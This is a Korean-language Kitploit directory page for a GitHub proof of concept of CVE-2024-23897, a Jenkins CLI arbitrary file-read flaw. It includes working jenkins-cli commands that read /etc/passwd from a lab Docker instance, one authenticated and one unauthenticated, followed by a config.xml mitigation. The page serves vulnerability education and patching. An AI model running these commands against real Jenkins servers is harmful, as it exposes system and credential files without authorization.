Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PoC-Fix-jenkins-rce_CVE-2024-23897 — 이 git에서 CVE-2024-23897에 대한 모든 정보를 찾을 수 있습니다. | Kitploit
도구/GitHubGitHub/10t4/poc-fix-jenkins-rce_cve-2024-23897
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHub10t4/poc-fix-jenkins-rce_cve-2024-23897

PoC-Fix-jenkins-rce_CVE-2024-23897

이 git에서 CVE-2024-23897에 대한 모든 정보를 찾을 수 있습니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
422년 전아직 검토되지 않음

PoC-jenkins-rce_CVE-2024-23897.

이 Git 저장소에서 CVE-2024-23897에 대한 모든 정보를 찾을 수 있습니다.

logo-jenkins

소개

이 문제는 CVE 식별자 CVE-2024-23897로 지정되었으며, 내장 명령줄 인터페이스를 통한 임의 파일 읽기 취약점으로 설명되었습니다. 이 명령 파서에는 인수에서 @ 문자 다음에 파일 경로가 오는 부분을 파일의 내용으로 대체하는 기능(expandAtFiles)이 있습니다. 이 기능은 기본적으로 활성화되어 있으며, Jenkins 2.441 및 이전 버전, LTS 2.426.2 및 이전 버전에서는 이를 비활성화하지 않습니다.

PoC

이 PoC를 위해, 저는 취약점 익스플로잇을 테스트하기 위해 Docker로 Jenkins 2.426.2를 설치했습니다.

root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 -v jenkins_home:/var/jenkins_home jenkins/jenkins:2.426.2

사용자와 비밀번호를 생성한 후, 공격 머신에 Jenkins CLI 클라이언트(jenkins-cli.jar)를 다운로드했습니다.

screen1

그런 다음, 익스플로잇 명령어를 작성했습니다. 이 명령어에는 Jenkins 사용자의 자격 증명이 필요합니다.

root@kitploit:~
java -jar jenkins-cli.jar -s http://192.168.1.45:8080/ -auth "user:aze+123" connect-node "@/etc/passwd"
screen2

또 다른 명령어는 인증 없이 파일의 첫 줄을 표시할 수 있습니다.

root@kitploit:~
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://192.168.1.45:8080' help "@/etc/passwd"
screen3

취약점 해결 방법

이 취약점에 대응하려면 config.xml이라는 Jenkins 구성 파일로 이동해야 합니다(제 경우 Docker 컨테이너 내에 있으므로 컨테이너의 셸 모드로 전환합니다).

screen4
다음 줄을 추가합니다:
root@kitploit:~
<expandAtFiles>false</expandAtFiles>

그리고 Jenkins를 재시작합니다:

root@kitploit:~
service jenkins restart
도구 다운로드